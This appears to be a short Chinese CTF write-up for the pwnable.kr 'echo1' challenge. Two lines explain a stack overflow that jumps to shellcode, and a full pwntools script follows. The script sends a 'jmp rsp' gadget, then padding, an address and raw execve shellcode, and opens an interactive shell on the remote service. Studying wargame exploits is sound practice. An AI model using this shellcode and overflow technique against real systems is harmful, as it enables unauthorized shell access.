pwnable之echo1
来源:互联网 发布:qq空间皮肤psd源码 编辑:程序博客网 时间:2024/06/16 21:00
这次的提是一个典型的栈溢出然后跳到shellcode上
id为我们输入的名字的低位所以让他为“jmp esp”即可
from pwn import *
context(arch='amd64', os='linux', endian='little', word_size=64)
p=remote("pwnable.kr",9010);
print p.recv(1024)
shellcode='\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
p.sendline(asm("jmp rsp"));
print p.recv(1024)
print p.recv(1024)
p.sendline("1")
print p.recv(1024)
p.sendline("a"*40+p64(0x00000000006020a0)+shellcode)
p.interactive()
阅读全文
0 0
- pwnable.kr 之echo1
- pwnable之echo1
- PWN学习之[Rookiss]-[echo1]
- pwnable之coin1
- pwnable之blackjack
- pwnable.kr 之fd
- pwnable.kr之bof
- pwnable.kr之flag
- pwnable.kr之passcode
- pwnable.kr之random
- pwnable.kr之shellshock
- pwnable.kr之mistake
- pwnable.kr之input
- pwnable.kr之lotto
- pwnable.kr之cmd1
- pwnable.kr之blackjack
- pwnable.kr之uaf
- pwnable之input
- Linux下VI/VIM提示没有权限保存时候的解决方法
- Calendar 计算某固定日期到当前时间相差的月份
- [未解决][lintcode]带最小值操作的栈
- AndroidStudio工程中"R"文件的位置
- hdu2532 Engine 模拟+排序
- pwnable之echo1
- mysql分库Max()函数出现两个值问题
- 20170705总结
- Android:利用xstream解析xml文件
- ssh和ssm框架整合步骤
- 20170706总结
- Sublime text 设置快捷键让html文件在浏览器中打开
- spfa算法
- JAVA反射入门